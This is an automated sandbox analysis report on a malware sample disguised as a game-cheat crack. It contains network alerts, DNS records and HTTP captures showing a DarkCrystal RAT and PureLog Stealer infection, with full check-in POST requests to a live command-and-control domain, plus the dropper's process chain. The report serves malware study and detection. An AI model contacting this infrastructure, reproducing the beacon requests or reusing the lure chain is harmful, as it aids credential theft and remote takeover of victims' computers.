                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x355f80x40.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x330000x278.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x3c5ec0x120.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                      .text0x10000x31bdc0x31c002831bb8b11e3209658a53131886cdf98False0.5909380888819096data6.712962136932442IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                      .rdata0x330000xaec00xb000042f11346230ca5aa360727d9908e809False0.4579190340909091data5.261605615899847IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                      .data0x3e0000x247200x10009670b581969e508258d8bc903025de5eFalse0.451416015625data4.387459135575936IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                      .didat0x630000x1900x200c83554035c63bb446c6208d0c8fa0256False0.4453125data3.3327310103022305IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                      .rsrc0x640000xdff80xe000ba08fbcd0ed7d9e6a268d75148d9914bFalse0.6373639787946429data6.638661032196024IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                      .reloc0x720000x233c0x240040b5e17755fd6fdd34de06e5cdb7f711False0.7749565972222222data6.623012966548067IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                      PNG0x646500xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States1.0027729636048528
                                                                                      PNG0x651980x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlacedEnglishUnited States0.9363390441839495
                                                                                      RT_ICON0x667480x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.47832369942196534
                                                                                      RT_ICON0x66cb00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.5410649819494585
                                                                                      RT_ICON0x675580xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.4933368869936034
                                                                                      RT_ICON0x684000x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/mEnglishUnited States0.5390070921985816
                                                                                      RT_ICON0x688680x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/mEnglishUnited States0.41393058161350843
                                                                                      RT_ICON0x699100x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/mEnglishUnited States0.3479253112033195
                                                                                      RT_ICON0x6beb80x3d71PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9809269502193401
                                                                                      RT_DIALOG0x705880x286dataEnglishUnited States0.5092879256965944
                                                                                      RT_DIALOG0x703580x13adataEnglishUnited States0.60828025477707
                                                                                      RT_DIALOG0x704980xecdataEnglishUnited States0.6991525423728814
                                                                                      RT_DIALOG0x702280x12edataEnglishUnited States0.5927152317880795
                                                                                      RT_DIALOG0x6fef00x338dataEnglishUnited States0.45145631067961167
                                                                                      RT_DIALOG0x6fc980x252dataEnglishUnited States0.5757575757575758
                                                                                      RT_STRING0x70f680x1e2dataEnglishUnited States0.3900414937759336
                                                                                      RT_STRING0x711500x1ccdataEnglishUnited States0.4282608695652174
                                                                                      RT_STRING0x713200x1b8dataEnglishUnited States0.45681818181818185
                                                                                      RT_STRING0x714d80x146dataEnglishUnited States0.5153374233128835
                                                                                      RT_STRING0x716200x46cdataEnglishUnited States0.3454063604240283
                                                                                      RT_STRING0x71a900x166dataEnglishUnited States0.49162011173184356
                                                                                      RT_STRING0x71bf80x152dataEnglishUnited States0.5059171597633136
                                                                                      RT_STRING0x71d500x10adataEnglishUnited States0.49624060150375937
                                                                                      RT_STRING0x71e600xbcdataEnglishUnited States0.6329787234042553
                                                                                      RT_STRING0x71f200xd6dataEnglishUnited States0.5747663551401869
                                                                                      RT_GROUP_ICON0x6fc300x68dataEnglishUnited States0.7019230769230769
                                                                                      RT_MANIFEST0x708100x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3957333333333333
                                                                                      DLLImport
                                                                                      KERNEL32.dllGetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
                                                                                      OLEAUT32.dllSysAllocString, SysFreeString, VariantClear
                                                                                      gdiplus.dllGdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree
                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                      EnglishUnited States
                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                      2025-01-13T13:17:13.575913+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.949882104.21.80.180TCP
                                                                                      2025-01-13T13:17:21.857172+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.952220104.21.80.180TCP
                                                                                      2025-01-13T13:17:36.857189+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.952270104.21.48.180TCP
                                                                                      2025-01-13T13:17:44.589748+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.952271104.21.48.180TCP
                                                                                      2025-01-13T13:17:56.779104+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.952272104.21.48.180TCP
                                                                                      2025-01-13T13:18:10.076013+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.952273104.21.48.180TCP
                                                                                      2025-01-13T13:18:25.076021+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.952274104.21.48.180TCP
                                                                                      2025-01-13T13:18:37.122916+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.952275104.21.48.180TCP
                                                                                      2025-01-13T13:18:45.076063+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.952276104.21.48.180TCP
                                                                                      2025-01-13T13:18:53.576114+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.952277104.21.48.180TCP
                                                                                      2025-01-13T13:19:05.388613+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.952278104.21.48.180TCP
                                                                                      2025-01-13T13:19:13.076114+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.952279104.21.48.180TCP
                                                                                      2025-01-13T13:19:20.732460+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.952280104.21.48.180TCP
                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Jan 13, 2025 13:17:13.068737984 CET4988280192.168.2.9104.21.80.1
                                                                                      Jan 13, 2025 13:17:13.073626995 CET8049882104.21.80.1192.168.2.9
                                                                                      Jan 13, 2025 13:17:13.073702097 CET4988280192.168.2.9104.21.80.1
                                                                                      Jan 13, 2025 13:17:13.074659109 CET4988280192.168.2.9104.21.80.1
                                                                                      Jan 13, 2025 13:17:13.079519033 CET8049882104.21.80.1192.168.2.9
                                                                                      Jan 13, 2025 13:17:13.420428991 CET4988280192.168.2.9104.21.80.1
                                                                                      Jan 13, 2025 13:17:13.425332069 CET8049882104.21.80.1192.168.2.9
                                                                                      Jan 13, 2025 13:17:13.521039009 CET8049882104.21.80.1192.168.2.9
                                                                                      Jan 13, 2025 13:17:13.575912952 CET4988280192.168.2.9104.21.80.1
                                                                                      Jan 13, 2025 13:17:13.756083012 CET8049882104.21.80.1192.168.2.9
                                                                                      Jan 13, 2025 13:17:13.853828907 CET8049882104.21.80.1192.168.2.9
                                                                                      Jan 13, 2025 13:17:13.854115963 CET4988280192.168.2.9104.21.80.1
                                                                                      Jan 13, 2025 13:17:14.261446953 CET4988280192.168.2.9104.21.80.1
                                                                                      Jan 13, 2025 13:17:20.318012953 CET5221253192.168.2.9162.159.36.2
                                                                                      Jan 13, 2025 13:17:20.322856903 CET5352212162.159.36.2192.168.2.9
                                                                                      Jan 13, 2025 13:17:20.322961092 CET5221253192.168.2.9162.159.36.2
                                                                                      Jan 13, 2025 13:17:20.360240936 CET5352212162.159.36.2192.168.2.9
                                                                                      Jan 13, 2025 13:17:20.777503967 CET5221253192.168.2.9162.159.36.2
                                                                                      Jan 13, 2025 13:17:20.782536983 CET5352212162.159.36.2192.168.2.9
                                                                                      Jan 13, 2025 13:17:20.783485889 CET5221253192.168.2.9162.159.36.2
                                                                                      Jan 13, 2025 13:17:21.324980974 CET5222080192.168.2.9104.21.80.1
                                                                                      Jan 13, 2025 13:17:21.329915047 CET8052220104.21.80.1192.168.2.9
                                                                                      Jan 13, 2025 13:17:21.329997063 CET5222080192.168.2.9104.21.80.1
                                                                                      Jan 13, 2025 13:17:21.330337048 CET5222080192.168.2.9104.21.80.1
                                                                                      Jan 13, 2025 13:17:21.335155964 CET8052220104.21.80.1192.168.2.9
                                                                                      Jan 13, 2025 13:17:21.699465990 CET5222080192.168.2.9104.21.80.1
                                                                                      Jan 13, 2025 13:17:21.704329014 CET8052220104.21.80.1192.168.2.9
                                                                                      Jan 13, 2025 13:17:21.774307966 CET8052220104.21.80.1192.168.2.9
                                                                                      Jan 13, 2025 13:17:21.857172012 CET5222080192.168.2.9104.21.80.1
                                                                                      Jan 13, 2025 13:17:22.019752026 CET8052220104.21.80.1192.168.2.9
                                                                                      Jan 13, 2025 13:17:22.169662952 CET5222080192.168.2.9104.21.80.1
                                                                                      Jan 13, 2025 13:17:22.484901905 CET5222080192.168.2.9104.21.80.1
                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Jan 13, 2025 13:17:13.049283028 CET6353153192.168.2.91.1.1.1
                                                                                      Jan 13, 2025 13:17:13.062206030 CET53635311.1.1.1192.168.2.9
                                                                                      Jan 13, 2025 13:17:20.288316011 CET5353038162.159.36.2192.168.2.9
                                                                                      Jan 13, 2025 13:17:20.796499968 CET5097853192.168.2.91.1.1.1
                                                                                      Jan 13, 2025 13:17:20.803776026 CET53509781.1.1.1192.168.2.9
                                                                                      Jan 13, 2025 13:17:36.252859116 CET5861753192.168.2.91.1.1.1
                                                                                      Jan 13, 2025 13:17:36.266851902 CET53586171.1.1.1192.168.2.9
                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                      Jan 13, 2025 13:17:13.049283028 CET192.168.2.91.1.1.10xa678Standard query (0)237025cm.n9shteam.inA (IP address)IN (0x0001)false
                                                                                      Jan 13, 2025 13:17:20.796499968 CET192.168.2.91.1.1.10x4ef4Standard query (0)171.39.242.20.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                                      Jan 13, 2025 13:17:36.252859116 CET192.168.2.91.1.1.10x4892Standard query (0)237025cm.n9shteam.inA (IP address)IN (0x0001)false
                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                      Jan 13, 2025 13:16:40.181052923 CET1.1.1.1192.168.2.90xb84bNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.netazurefd-t-fb-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                      Jan 13, 2025 13:16:40.181052923 CET1.1.1.1192.168.2.90xb84bNo error (0)dual.s-part-0017.t-0009.fb-t-msedge.nets-part-0017.t-0009.fb-t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                      Jan 13, 2025 13:16:40.181052923 CET1.1.1.1192.168.2.90xb84bNo error (0)s-part-0017.t-0009.fb-t-msedge.net13.107.253.45A (IP address)IN (0x0001)false
                                                                                      Jan 13, 2025 13:17:13.062206030 CET1.1.1.1192.168.2.90xa678No error (0)237025cm.n9shteam.in104.21.80.1A (IP address)IN (0x0001)false
                                                                                      Jan 13, 2025 13:17:13.062206030 CET1.1.1.1192.168.2.90xa678No error (0)237025cm.n9shteam.in104.21.16.1A (IP address)IN (0x0001)false
                                                                                      Jan 13, 2025 13:17:13.062206030 CET1.1.1.1192.168.2.90xa678No error (0)237025cm.n9shteam.in104.21.48.1A (IP address)IN (0x0001)false
                                                                                      Jan 13, 2025 13:17:13.062206030 CET1.1.1.1192.168.2.90xa678No error (0)237025cm.n9shteam.in104.21.96.1A (IP address)IN (0x0001)false
                                                                                      Jan 13, 2025 13:17:13.062206030 CET1.1.1.1192.168.2.90xa678No error (0)237025cm.n9shteam.in104.21.32.1A (IP address)IN (0x0001)false
                                                                                      Jan 13, 2025 13:17:13.062206030 CET1.1.1.1192.168.2.90xa678No error (0)237025cm.n9shteam.in104.21.64.1A (IP address)IN (0x0001)false
                                                                                      Jan 13, 2025 13:17:13.062206030 CET1.1.1.1192.168.2.90xa678No error (0)237025cm.n9shteam.in104.21.112.1A (IP address)IN (0x0001)false
                                                                                      Jan 13, 2025 13:17:20.803776026 CET1.1.1.1192.168.2.90x4ef4Name error (3)171.39.242.20.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                                      Jan 13, 2025 13:17:36.266851902 CET1.1.1.1192.168.2.90x4892No error (0)237025cm.n9shteam.in104.21.48.1A (IP address)IN (0x0001)false
                                                                                      Jan 13, 2025 13:17:36.266851902 CET1.1.1.1192.168.2.90x4892No error (0)237025cm.n9shteam.in104.21.96.1A (IP address)IN (0x0001)false
                                                                                      Jan 13, 2025 13:17:36.266851902 CET1.1.1.1192.168.2.90x4892No error (0)237025cm.n9shteam.in104.21.112.1A (IP address)IN (0x0001)false
                                                                                      Jan 13, 2025 13:17:36.266851902 CET1.1.1.1192.168.2.90x4892No error (0)237025cm.n9shteam.in104.21.64.1A (IP address)IN (0x0001)false
                                                                                      Jan 13, 2025 13:17:36.266851902 CET1.1.1.1192.168.2.90x4892No error (0)237025cm.n9shteam.in104.21.32.1A (IP address)IN (0x0001)false
                                                                                      Jan 13, 2025 13:17:36.266851902 CET1.1.1.1192.168.2.90x4892No error (0)237025cm.n9shteam.in104.21.16.1A (IP address)IN (0x0001)false
                                                                                      Jan 13, 2025 13:17:36.266851902 CET1.1.1.1192.168.2.90x4892No error (0)237025cm.n9shteam.in104.21.80.1A (IP address)IN (0x0001)false
                                                                                      • 237025cm.n9shteam.in
                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      0192.168.2.949882104.21.80.1807508C:\Program Files\Windows NT\smss.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Jan 13, 2025 13:17:13.074659109 CET306OUTPOST /UpdatesqlCdn.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                      Host: 237025cm.n9shteam.in
                                                                                      Content-Length: 344
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Jan 13, 2025 13:17:13.420428991 CET344OUTData Raw: 00 03 01 06 03 0d 01 03 05 06 02 01 02 00 01 02 00 0b 05 0e 02 01 03 0e 02 00 0f 04 06 0f 06 03 0c 0f 03 08 02 53 05 01 0f 02 06 00 04 01 07 05 06 0b 0d 00 0d 0e 04 0a 07 01 07 0d 06 51 05 0b 00 56 0e 0f 04 56 04 06 0d 57 0b 02 0d 04 0b 08 07 0c
                                                                                      Data Ascii: SQVVWRVU\L~@NTtaj\bep~oit^k`hlR`[l^zJhn`@`Yte~V@xmP~bi
                                                                                      Jan 13, 2025 13:17:13.521039009 CET25INHTTP/1.1 100 Continue
                                                                                      Jan 13, 2025 13:17:13.756083012 CET1028INHTTP/1.1 404 Not Found
                                                                                      Date: Mon, 13 Jan 2025 12:17:13 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      cf-cache-status: DYNAMIC
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Hv6AXVENQPFAg%2BT52K2QdTC7osc7Ath%2F3eelVnd%2FeVxxC49VFN8lpuS6BPS3bbSWnipcpvPOWV9z%2F2nJ1IjbZIWPe4Fe6vkkmrgEnT99vReBAb0eqGnp5vBV70Rmy%2Fkpk4rGiDkNKQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 9015526b3feac443-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2886&min_rtt=1686&rtt_var=3033&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=650&delivery_rate=129329&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                      Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                      Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                                                                      Jan 13, 2025 13:17:13.853828907 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      1192.168.2.952220104.21.80.1802192C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Jan 13, 2025 13:17:21.330337048 CET306OUTPOST /UpdatesqlCdn.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                      Host: 237025cm.n9shteam.in
                                                                                      Content-Length: 344
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Jan 13, 2025 13:17:21.699465990 CET344OUTData Raw: 00 02 04 02 06 09 01 07 05 06 02 01 02 06 01 05 00 07 05 09 02 07 03 0e 03 07 0e 01 03 06 01 57 0f 00 03 0e 02 56 06 02 0d 05 07 0b 07 0a 07 04 04 50 0b 0b 0c 04 04 05 05 07 03 00 06 52 05 0a 02 00 0f 0a 04 05 01 04 0e 07 0c 00 0c 06 0e 03 07 06
                                                                                      Data Ascii: WVPRXQP\L~C~`_\tamBbupB~oacl^OhMtDoBzpjJkCkTcwx}e~V@B{SfN}Li
                                                                                      Jan 13, 2025 13:17:21.774307966 CET25INHTTP/1.1 100 Continue
                                                                                      Jan 13, 2025 13:17:22.019752026 CET1038INHTTP/1.1 404 Not Found
                                                                                      Date: Mon, 13 Jan 2025 12:17:21 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      cf-cache-status: DYNAMIC
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Fs90pKoEXzLjXiSDTycAoqO2ZJm4jnTr8TwTqDY7%2F96d4%2F5Ycyz%2B63SfLQxmyUGdJYMNWxBWy2%2BdRKNbpcrKxSsdw2AiwPPPmjooin4Xj%2FqDZ%2F%2F0EgHdHjYDpjD4i%2BwLEVmpLFEbjg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 9015529edc7a7d0e-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=4043&min_rtt=1920&rtt_var=4967&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=650&delivery_rate=77211&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                      Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


                                                                                      Click to jump to process

                                                                                      Click to jump to process

                                                                                      Click to dive into process behavior distribution

                                                                                      Click to jump to process

                                                                                      Target ID:0
                                                                                      Start time:07:16:44
                                                                                      Start date:13/01/2025
                                                                                      Path:C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe"
                                                                                      Imagebase:0x1c0000
                                                                                      File size:2'866'940 bytes
                                                                                      MD5 hash:DF15D1F8F7CC71BB1889895B367C7D2C
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1360056049.00000000075E6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1358955428.0000000006CE9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:2
                                                                                      Start time:07:16:45
                                                                                      Start date:13/01/2025
                                                                                      Path:C:\Windows\SysWOW64\wscript.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\System32\WScript.exe" "C:\portsurrogateFontCrt\unyQgcnbrXR6kUk3LNilotfJnp9OLZPJv809nYh2EMxHRw3.vbe"
                                                                                      Imagebase:0xbc0000
                                                                                      File size:147'456 bytes
                                                                                      MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:3
                                                                                      Start time:07:16:51
                                                                                      Start date:13/01/2025
                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\portsurrogateFontCrt\mhHwHj5jfnxhi.bat" "
                                                                                      Imagebase:0xc50000
                                                                                      File size:236'544 bytes
                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:4
                                                                                      Start time:07:16:51
                                                                                      Start date:13/01/2025
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff70f010000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:5
                                                                                      Start time:07:16:52
                                                                                      Start date:13/01/2025
                                                                                      Path:C:\portsurrogateFontCrt\BlockcontainerWin.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"C:\portsurrogateFontCrt/BlockcontainerWin.exe"
                                                                                      Imagebase:0xfd0000
                                                                                      File size:2'545'152 bytes
                                                                                      MD5 hash:B3F6318C958712D0C78B5A969EE2EFD1
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000005.00000000.1428074698.0000000000FD2000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000005.00000002.1537127203.0000000013585000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
